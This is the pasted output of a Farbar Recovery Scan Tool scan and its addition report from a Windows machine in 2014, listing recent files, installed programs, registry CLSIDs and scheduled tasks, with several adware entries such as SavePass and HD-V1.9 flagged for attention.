2014-08-04 13:05 - 2013-10-08 10:27 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-08-04 11:34 - 2011-06-18 04:35 - 00000000 ____D () C:\Users\User\AppData\Roaming\Notepad++
2014-08-04 11:17 - 2013-12-18 14:54 - 00000000 ____D () C:\Program Files\Sublime Text 3
2014-08-04 11:17 - 2013-11-21 01:16 - 00001043 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sublime Text 3.lnk
2014-08-04 10:50 - 2012-02-06 11:36 - 00000000 ____D () C:\Users\User\AppData\Roaming\FileZilla
2014-08-04 10:11 - 2012-02-06 11:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileZilla FTP Client
2014-08-04 10:11 - 2012-02-06 11:36 - 00000000 ____D () C:\Program Files\FileZilla FTP Client
2014-08-04 10:10 - 2014-08-04 10:09 - 06004615 _____ (Tim Kosse) C:\Users\User\Downloads\FileZilla_3.9.0.2_win32-setup.exe
2014-08-04 09:37 - 2012-02-05 10:20 - 00000000 ____D () C:\ProgramData\MFAData
2014-08-03 11:28 - 2014-08-03 11:28 - 00000000 ____D () C:\Windows\system32\%LOCALAPPDATA%
2014-08-03 11:22 - 2014-08-03 11:22 - 00000000 ____D () C:\Windows\system32\cache
2014-08-03 11:21 - 2009-07-14 10:31 - 00001515 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-08-03 11:18 - 2014-08-01 17:57 - 00000000 ____D () C:\ProgramData\AVG Security Toolbar
2014-08-01 18:05 - 2014-08-01 17:57 - 00000000 ____D () C:\Users\User\AppData\Local\AVG Web TuneUp
2014-08-01 17:57 - 2014-08-01 17:57 - 00000000 ____D () C:\ProgramData\AVG Web TuneUp
2014-08-01 17:57 - 2014-08-01 17:57 - 00000000 ____D () C:\ProgramData\AVG Secure Search
2014-08-01 17:57 - 2014-08-01 17:57 - 00000000 ____D () C:\Program Files\Common Files\AVG Secure Search
2014-08-01 17:57 - 2014-08-01 17:57 - 00000000 ____D () C:\Program Files\AVG Web TuneUp
2014-08-01 17:56 - 2014-08-01 17:57 - 00042784 _____ (AVG Technologies) C:\Windows\system32\Drivers\avgtpx86.sys
2014-08-01 14:42 - 2014-06-25 11:23 - 00000000 ____D () C:\Users\User\mypythonstuff
2014-08-01 13:40 - 2014-07-24 11:25 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VisualSVN
2014-08-01 13:40 - 2014-07-24 11:25 - 00000000 ____D () C:\Program Files\VisualSVN Server
2014-08-01 12:48 - 2014-08-01 12:48 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7
2014-08-01 12:48 - 2013-08-06 12:33 - 00000000 ____D () C:\Python27
2014-08-01 12:46 - 2014-05-02 17:41 - 00000000 ____D () C:\Users\miracle 5
2014-08-01 12:46 - 2013-04-05 11:21 - 00000000 ____D () C:\Users\Classic .NET AppPool
2014-08-01 12:46 - 2012-09-18 12:54 - 00000000 ____D () C:\Users\postgres
2014-08-01 12:46 - 2009-07-14 08:22 - 00000000 __RHD () C:\Users\Default
2014-08-01 12:46 - 2009-07-14 08:22 - 00000000 ___RD () C:\Users\Public
2014-08-01 11:57 - 2014-07-11 18:22 - 00000000 ____D () C:\Users\User\Desktop\maintainance
2014-08-01 11:56 - 2011-06-18 04:35 - 00000000 ____D () C:\Program Files\Notepad++
2014-08-01 11:50 - 2013-09-17 17:10 - 00000000 ____D () C:\Users\User\AppData\Local\CrashDumps
2014-08-01 11:50 - 2012-01-11 18:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinMerge
2014-08-01 11:50 - 2012-01-11 18:46 - 00000000 ____D () C:\Program Files\WinMerge
2014-08-01 11:47 - 2014-08-01 11:47 - 00000000 ____D () C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-08-01 11:47 - 2014-08-01 11:47 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-08-01 11:47 - 2011-07-31 13:20 - 00000000 ____D () C:\Program Files\WinRAR
2014-07-31 17:37 - 2014-07-31 17:37 - 00002121 _____ () C:\Users\User\Desktop\Tweaking.com - Windows Repair (All in One).lnk
2014-07-31 17:37 - 2014-07-31 17:37 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-07-31 17:36 - 2014-07-31 17:36 - 00000000 ____D () C:\Program Files\Tweaking.com
2014-07-31 17:16 - 2013-05-17 10:43 - 00000000 ____D () C:\Program Files\Free Download Manager
2014-07-31 17:15 - 2012-08-20 18:15 - 00000000 ____D () C:\Program Files\eclipse
2014-07-31 16:44 - 2014-07-31 16:44 - 00001163 _____ () C:\Users\Public\Desktop\Navicat Premium.lnk
2014-07-31 13:26 - 2014-07-31 13:04 - 00000000 ____D () C:\ProgramData\AVG2014
2014-07-31 13:26 - 2014-07-31 13:00 - 00000000 ____D () C:\Users\User\AppData\Local\Avg2014
2014-07-31 13:14 - 2011-07-05 00:26 - 00000000 ____D () C:\Program Files\XMind
2014-07-31 13:10 - 2014-07-31 13:10 - 00000000 ____D () C:\Users\User\AppData\Roaming\AVG2014
2014-07-31 13:06 - 2014-07-31 13:06 - 00000935 _____ () C:\Users\Public\Desktop\AVG 2014.lnk
2014-07-31 13:06 - 2014-07-31 13:06 - 00000000 ____D () C:\Users\User\AppData\Roaming\TuneUp Software
2014-07-31 13:06 - 2014-07-31 13:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-07-31 13:04 - 2012-02-05 10:41 - 00000000 ___HD () C:\$AVG
2014-07-31 13:04 - 2012-02-05 10:21 - 00000000 ____D () C:\Program Files\AVG
2014-07-31 13:00 - 2014-07-31 13:00 - 00000000 ____D () C:\Users\User\AppData\Local\MFAData
2014-07-31 12:19 - 2011-03-09 14:48 - 00947928 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-07-31 11:38 - 2014-07-30 15:03 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-07-31 11:38 - 2014-07-28 14:44 - 00338870 _____ () C:\Windows\PFRO.log
2014-07-31 11:36 - 2014-07-31 11:36 - 00000000 ____D () C:\Qoobox
2014-07-31 11:36 - 2014-07-31 11:35 - 00000000 ___SD () C:\32788R22FWJFW
2014-07-31 11:35 - 2014-07-31 11:35 - 00000000 ____D () C:\Windows\erdnt
2014-07-31 10:18 - 2014-07-30 16:01 - 00000000 ____D () C:\AdwCleaner
2014-07-31 10:09 - 2012-09-24 17:52 - 00007609 _____ () C:\Users\User\AppData\Local\Resmon.ResmonCfg
2014-07-30 15:50 - 2011-06-16 03:04 - 00000000 ____D () C:\Program Files\NetBeans 6.9.1
2014-07-30 15:14 - 2012-08-06 10:52 - 00460643 _____ () C:\git_shell_ext_debug.txt
2014-07-30 15:11 - 2014-07-30 15:11 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-07-30 15:09 - 2013-08-07 12:04 - 00000000 ____D () C:\Program Files\Mozilla Thunderbird
2014-07-30 15:06 - 2014-07-30 15:06 - 00776976 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys.1406712158422
2014-07-30 15:06 - 2014-07-30 15:06 - 00411552 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys.1406712158422
2014-07-30 14:50 - 2014-07-30 14:46 - 00004088 _____ () C:\Users\User\Desktop\Rkill.txt
2014-07-30 09:20 - 2014-07-30 09:20 - 00000687 _____ () C:\awhE80D.tmp
2014-07-29 19:10 - 2014-07-03 14:40 - 00002629 _____ () C:\Users\User\.dbshell
2014-07-29 16:50 - 2014-07-29 16:50 - 00000687 _____ () C:\awhF508.tmp
2014-07-29 12:35 - 2014-07-29 12:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Evernote
2014-07-29 10:51 - 2014-07-29 10:51 - 00000687 _____ () C:\awhDFF2.tmp
2014-07-29 09:15 - 2014-07-29 09:15 - 00000687 _____ () C:\awhE5AC.tmp
2014-07-28 15:09 - 2014-07-28 15:09 - 00000687 _____ () C:\awhE446.tmp
2014-07-28 15:05 - 2014-07-04 10:28 - 00000000 ____D () C:\Program Files\QuickTime
2014-07-28 15:01 - 2014-07-25 16:34 - 00000000 ____D () C:\Program Files\Bulk Rename Utility
2014-07-28 15:00 - 2014-07-28 15:00 - 00000000 ____D () C:\Windows\pss
2014-07-28 14:49 - 2014-07-28 14:49 - 00000687 _____ () C:\awhE040.tmp
2014-07-28 14:42 - 2014-06-30 10:33 - 00000000 ____D () C:\Program Files\TrustMediaViewerV1
2014-07-28 14:41 - 2013-09-30 17:00 - 00000000 ____D () C:\Users\User\Documents\Visual Studio 2012
2014-07-28 14:12 - 2014-07-28 14:12 - 00000687 _____ () C:\awh4D83.tmp
2014-07-28 14:10 - 2013-05-17 10:43 - 00000000 ____D () C:\Users\User\AppData\Roaming\Free Download Manager
2014-07-28 14:07 - 2014-07-28 14:07 - 00000000 _____ () C:\Windows\setuperr.log
2014-07-28 11:43 - 2014-07-28 11:43 - 00000000 ____D () C:\Users\User\Documents\iTools
2014-07-28 11:39 - 2012-01-13 15:52 - 00000000 ____D () C:\Users\User\AppData\Roaming\uTorrent
2014-07-28 11:38 - 2011-09-02 13:47 - 00000000 ____D () C:\Windows\Minidump
2014-07-28 11:38 - 2011-03-09 14:32 - 00000000 ____D () C:\Windows\Panther
2014-07-28 11:18 - 2014-07-28 11:18 - 00199672 _____ () C:\Users\User\Documents\cc_20140728_111739.reg
2014-07-28 11:11 - 2014-07-28 11:11 - 00000969 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-07-28 11:11 - 2014-07-28 11:11 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-07-28 11:11 - 2014-07-28 11:11 - 00000000 ____D () C:\Program Files\CCleaner
2014-07-28 10:09 - 2014-07-25 16:46 - 00000000 ____D () C:\Users\User\AppData\Local\1682
2014-07-28 09:23 - 2014-07-28 09:23 - 00000687 _____ () C:\awhE9F0.tmp
2014-07-25 17:58 - 2014-07-25 17:58 - 00000687 _____ () C:\awhF150.tmp
2014-07-25 17:53 - 2014-05-06 18:44 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-07-25 16:33 - 2013-10-08 10:36 - 00002187 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-07-25 14:46 - 2014-07-25 14:44 - 05981830 ____N (Tim Kosse) C:\Users\User\Downloads\FileZilla_3.9.0.1_win32-setup.exe
2014-07-25 09:21 - 2011-06-10 22:45 - 00000000 ___RD () C:\Program Files\Skype
2014-07-25 09:16 - 2014-07-25 09:16 - 00000687 _____ () C:\awhE954.tmp
2014-07-24 09:48 - 2013-10-17 11:38 - 00001012 _____ () C:\Users\User\Desktop\Dropbox.lnk
2014-07-24 09:48 - 2012-01-10 15:01 - 00000000 ____D () C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-07-24 09:13 - 2014-07-24 09:13 - 00000687 _____ () C:\awhDC4A.tmp
2014-07-23 10:52 - 2011-06-06 09:50 - 00231584 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-07-23 09:25 - 2014-07-23 09:25 - 00000687 _____ () C:\awhDDEF.tmp
2014-07-22 18:54 - 2014-07-22 15:53 - 00000000 ____D () C:\Users\User\AppData\Roaming\DBDesigner4
2014-07-22 18:23 - 2014-07-22 18:23 - 00000000 ____D () C:\Users\User\Documents\Toad Data Modeler
2014-07-22 15:22 - 2014-07-22 15:22 - 00000687 _____ () C:\awhE1D6.tmp
2014-07-22 15:17 - 2009-07-14 10:38 - 00032580 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-07-22 09:24 - 2014-07-22 09:24 - 00000687 _____ () C:\awhE465.tmp
2014-07-21 09:21 - 2014-07-21 09:21 - 00000687 _____ () C:\awhDBEC.tmp
2014-07-18 09:16 - 2014-07-18 09:16 - 00000687 _____ () C:\awhDCA8.tmp
2014-07-16 09:17 - 2014-07-16 09:17 - 00000687 _____ () C:\awhD8A2.tmp
2014-07-15 09:16 - 2014-07-15 09:16 - 00000687 _____ () C:\awhD9F9.tmp
2014-07-14 09:26 - 2014-07-14 09:26 - 00000687 _____ () C:\awhD9CA.tmp
2014-07-11 18:27 - 2014-06-13 17:36 - 00000000 ____D () C:\Users\User\AppData\Local\Adobe
2014-07-11 09:08 - 2014-07-11 09:08 - 00000687 _____ () C:\awhDCF6.tmp
2014-07-10 11:51 - 2014-07-10 11:51 - 00000804 _____ () C:\Users\User\out.sql
2014-07-10 10:09 - 2014-07-10 10:09 - 00000687 _____ () C:\awhDA18.tmp
2014-07-10 09:15 - 2014-07-10 09:15 - 00000687 _____ () C:\awhDC88.tmp
2014-07-09 12:36 - 2012-04-08 09:26 - 00699056 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-07-09 12:36 - 2011-06-06 09:57 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-07-09 11:26 - 2013-12-20 14:52 - 00001060 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 9.lnk
2014-07-09 09:14 - 2014-07-09 09:14 - 00000687 _____ () C:\awhDCD6.tmp
2014-07-08 09:49 - 2014-03-21 14:38 - 00000981 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ownCloud.lnk
2014-07-08 09:49 - 2014-03-21 14:38 - 00000969 _____ () C:\Users\User\Desktop\ownCloud.lnk
2014-07-08 09:49 - 2014-03-21 14:38 - 00000000 ____D () C:\Users\User\AppData\Local\ownCloud
2014-07-08 09:49 - 2014-03-21 14:38 - 00000000 ____D () C:\Program Files\ownCloud
2014-07-08 09:22 - 2014-07-08 09:22 - 00000687 _____ () C:\awhE0EC.tmp
2014-07-07 09:25 - 2014-07-07 09:25 - 00000687 _____ () C:\awhD74B.tmp
 
Files to move or delete:
====================
C:\Users\User\.mongorc.js
C:\Users\User\test.bat
 
 
Some content of TEMP:
====================
C:\Users\User\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpc7plhn.dll
C:\Users\User\AppData\Local\Temp\Quarantine.exe
C:\Users\User\AppData\Local\Temp\xmlUpdater.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => MD5 is legit
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
And here's the addition.txt
------------------------------------
Additional scan result of Farbar Recovery Scan Tool (x86) Version:2-08-2014
Ran by User at 2014-08-04 13:50:48
Running from E:\Myfiles and backup\svchost remover
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: AVG AntiVirus Free Edition 2014 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition 2014 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe Flash Player 14 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Flash Player 14 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Apple Application Support (HKLM\...\{D9DAD0FF-495A-472B-9F10-BAE430A26682}) (Version: 3.0.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{18D47FA1-0440-48D3-A7E0-DA09537FF471}) (Version: 7.1.1.3 - Apple Inc.)
AVG 2014 (HKLM\...\AVG) (Version: 2014.0.4716 - AVG Technologies)
AVG 2014 (Version: 14.0.3986 - AVG Technologies) Hidden
AVG 2014 (Version: 14.0.4716 - AVG Technologies) Hidden
AVG Web TuneUp (HKLM\...\AVG Web TuneUp) (Version: 3.1.0.6 - AVG Technologies)
CCleaner (HKLM\...\CCleaner) (Version: 4.16 - Piriform)
CommitMonitor 1.9.2.911 (HKLM\...\{DDD21BC1-FA1E-4DE0-82D8-5EB7727DE1AD}) (Version: 1.9.911 - Stefans Tools)
Dropbox (HKCU\...\Dropbox) (Version: 2.10.3 - Dropbox, Inc.)
Electric Mobile Studio 2012 version 1.10b (HKLM\...\{97EB6DAF-EEFC-46F5-A61E-D5F79192FF95}_is1) (Version: 1.10b - electric plum, LLC)
Evernote v. 5.5.2 (HKLM\...\{16730E6C-1114-11E4-9120-00163E98E7D0}) (Version: 5.5.2.4187 - Evernote Corp.)
FileZilla Client 3.9.0.2 (HKLM\...\FileZilla Client) (Version: 3.9.0.2 - Tim Kosse)
Google Chrome (HKLM\...\Google Chrome) (Version: 36.0.1985.125 - Google Inc.)
Google Talk (remove only) (HKLM\...\{226b64e8-dc75-4eea-a6c8-abcb496320f2}-Google Talk) (Version:  - )
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
iCloud (HKLM\...\{00A61104-74B5-4056-AD00-4397EF4FB141}) (Version: 3.1.0.40 - Apple Inc.)
iTunes (HKLM\...\{0718A90E-93AA-49AF-A4FE-0165ACD91DF0}) (Version: 11.2.2.3 - Apple Inc.)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.150.1 - McAfee, Inc.)
Media Buzz (HKLM\...\MediaBuzzV1mode6898) (Version: 1.1 - Media Buzz) <==== ATTENTION
Media Player (HKLM\...\MediaPlayerV1alpha583) (Version: 1.1 - Media Player) <==== ATTENTION
Media View (HKLM\...\MediaViewV1alpha678) (Version: 1.1 - Media View) <==== ATTENTION
Media Viewer (HKLM\...\MediaViewerV1alpha442) (Version: 1.1 - Media Viewer) <==== ATTENTION
Media Watch (HKLM\...\MediaWatchV1home1288) (Version: 1.1 - Media Watch) <==== ATTENTION
Mozilla Firefox 29.0 (x86 en-US) (HKLM\...\Mozilla Firefox 29.0 (x86 en-US)) (Version: 29.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 29.0 - Mozilla)
Network System Driver (HKLM\...\inethnfd) (Version: 1.0.0.3001 - ) <==== ATTENTION
Node.js (HKLM\...\{053D3A58-6440-4281-9495-31C07078724B}) (Version: 0.10.26 - Joyent, Inc. and other Node contributors)
Notepad++ (HKLM\...\Notepad++) (Version: 6.6.8 - Notepad++ Team)
ownCloud (HKLM\...\ownCloud) (Version: 1.6.1.3267 - ownCloud)
Poedit (HKLM\...\{68EB2C37-083A-4303-B5D8-41FA67E50B8F}_is1) (Version: 1.6.3 - Vaclav Slavik)
PremiumSoft Navicat Premium 9.1 (HKLM\...\PremiumSoft Navicat Premium_is1) (Version:  - PremiumSoft CyberTech Ltd.)
Python 2.7.4 (HKLM\...\{84ADC96C-B7E0-4938-9D6E-2B640D5DA224}) (Version: 2.7.4150 - Python Software Foundation)
QuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Rich Media View (HKLM\...\RichMediaViewV1release335) (Version: 1.1 - Rich Media View) <==== ATTENTION
Skype Click to Call (HKLM\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)
Skype™ 6.16 (HKLM\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.16.105 - Skype Technologies S.A.)
Snagit 11 (HKLM\...\{68723B04-57EC-11E1-A6A8-9E2D4824019B}) (Version: 11.1.0 - TechSmith Corporation)
SQL-Splitter 1.2.0.1 (HKLM\...\SQL-Splitter_is1) (Version:  - CoolFactory)
SSH Secure Shell (HKLM\...\{74E2CD0C-D4A2-11D3-95A6-0000E86CFDE5}) (Version:  - )
Sublime Text 2.0.2 (HKLM\...\Sublime Text 2_is1) (Version:  - )
Sublime Text Build 3059 (HKLM\...\Sublime Text 3_is1) (Version:  - Sublime HQ Pty Ltd)
TeamViewer 9 (HKLM\...\TeamViewer 9) (Version: 9.0.29947 - TeamViewer)
TortoiseSVN 1.8.4.24972 (32 bit) (HKLM\...\{F4E3A752-5AF9-4204-8416-8E58B9041A37}) (Version: 1.8.24972 - TortoiseSVN)
Tweaking.com - Windows Repair (All in One) (HKLM\...\Tweaking.com - Windows Repair (All in One)) (Version: 2.8.3 - Tweaking.com)
Video Player (HKLM\...\Video Player) (Version: 1.1 - Video Player) <==== ATTENTION
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VisualSVN Server 2.7.7 (HKLM\...\{1AA8EDDB-569D-4008-B3D6-0D64586900A5}) (Version: 2.7.7.0 - VisualSVN Ltd.)
Webexp Enhanced (HKLM\...\Webexp Enhanced) (Version: 1.1 - Webexp Enhanced) <==== ATTENTION
Winamp (HKLM\...\Winamp) (Version: 5.65  - Nullsoft, Inc)
Winamp Detector Plug-in (HKCU\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
WinMerge 2.12.4 (HKLM\...\WinMerge_is1) (Version: 2.12.4 - Thingamahoochie Software)
WinRAR 4.01 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.01.0 - win.rar GmbH)
WordWeb (HKLM\...\WordWeb) (Version: 7 - WordWeb Software)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-3613995967-3578341659-1565537388-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3613995967-3578341659-1565537388-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3613995967-3578341659-1565537388-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3613995967-3578341659-1565537388-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3613995967-3578341659-1565537388-1000_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3613995967-3578341659-1565537388-1000_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3613995967-3578341659-1565537388-1000_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3613995967-3578341659-1565537388-1000_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
 
==================== Restore Points  =========================
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2014-07-30 18:50 - 2014-07-30 18:49 - 00000833 ____A C:\Windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0F661297-F6CD-4EAF-9440-83B17111CDEE} - System32\Tasks\cleanmgr => C:\Windows\System32\cleanmgr.exe [2009-07-14] (Microsoft Corporation)
Task: {10C2ABB9-D163-4053-A153-272108B0BE0C} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-1 => C:\Program Files\SavePass\SavePass-codedownloader.exe
Task: {19CA6FD8-2563-4B2B-A981-74460943CF0B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2013-10-08] (Google Inc.)
Task: {1F965C1F-86AC-409C-A56E-7B1C631E35DD} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-07-09] (Adobe Systems Incorporated)
Task: {28F4F69A-F5DE-4960-AF4D-0EAA3F9CAD99} - System32\Tasks\{D59763BF-06B8-404B-95FF-421CD5C22255} => C:\Program Files\Skype\\Phone\Skype.exe [2014-05-08] (Skype Technologies S.A.)
Task: {3206B607-DB71-425F-940E-C816E31FD593} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-6 => C:\Program Files\SavePass\SavePass-novainstaller.exe
Task: {367973C4-3E06-4099-8A4B-C8ABBE2DF971} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-11 => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-11.exe
Task: {4149056B-A547-4B75-8DDE-52B305988538} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-6 => C:\Program Files\HD-V1.9\HD-V1.9-novainstaller.exe <==== ATTENTION
Task: {446F91DD-E862-4FC6-A4AC-7120EFF603C4} - System32\Tasks\{42C70AC3-B6DA-41F5-B6E5-909EBB1BF66F} => Chrome.exe http://ui.skype.com/ui/0/6.9.0.106/en/go/help.faq.installer?LastError=1638
Task: {44B1EBC4-F3C9-4747-AD60-8A14FE9A08CA} - System32\Tasks\{B7C01B5D-C31F-49D7-8660-EE32FB733191} => Chrome.exe http://ui.skype.com/ui/0/6.9.0.106/en/go/help.faq.installer?LastError=1638
Task: {47F7A1AB-F383-4459-BF5D-B641A5A6A43F} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-10 => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-10.exe <==== ATTENTION
Task: {608758A9-D0C7-4606-8D6E-5086B51BB960} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-5 => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-5.exe <==== ATTENTION
Task: {60F0A6E3-D33E-4099-BC95-6C98F4C7ADB5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2013-10-08] (Google Inc.)
Task: {6240C4AD-D1D6-4C34-95DF-7ADFE8D01EC6} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-2 => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-2.exe <==== ATTENTION
Task: {690783CD-1C38-415E-AA48-1E081A1FF466} - System32\Tasks\SDMsgUpdate (SD) => C:\Program Files\SmartDraw 2013\Messages\SDNotify.exe
Task: {6BE7A4E0-1DFB-46A3-BA4D-3DBB74CEBFEA} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-1 => C:\Program Files\HD-V1.9\HD-V1.9-codedownloader.exe <==== ATTENTION
Task: {74987F6F-A159-45E2-8C24-0C73037232B8} - System32\Tasks\AdobeAAMUpdater-1.0-SUMAN-User => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-03-06] (Adobe Systems Incorporated)
Task: {7516F39F-B6A3-4E56-BFAC-264330D3F6CB} - System32\Tasks\{A3610ECF-1343-4654-A3C6-AB691BE4C498} => Chrome.exe http://ui.skype.com/ui/0/6.9.0.106/en/go/help.faq.installer?LastError=1638
Task: {754B1E79-F16F-4262-ABCF-44BD5A13EB89} - System32\Tasks\{3DCD7273-2F81-4C04-89C5-8844A1F8152F} => Chrome.exe http://ui.skype.com/ui/0/6.9.0.106/en/go/help.faq.installer?LastError=1638
Task: {7EE56EA1-64B5-4425-AA91-BFA549179B1F} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-5_user => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-5.exe <==== ATTENTION
Task: {847149B5-061A-435F-820D-D11252562C03} - System32\Tasks\{FD3D34B4-B3B7-47E4-BCAB-08C318DB3D9B} => Chrome.exe http://ui.skype.com/ui/0/6.9.0.106/en/go/help.faq.installer?LastError=1638
Task: {8F88F311-BC27-47F3-A17C-342CD8A3F684} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-4 => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-4.exe <==== ATTENTION
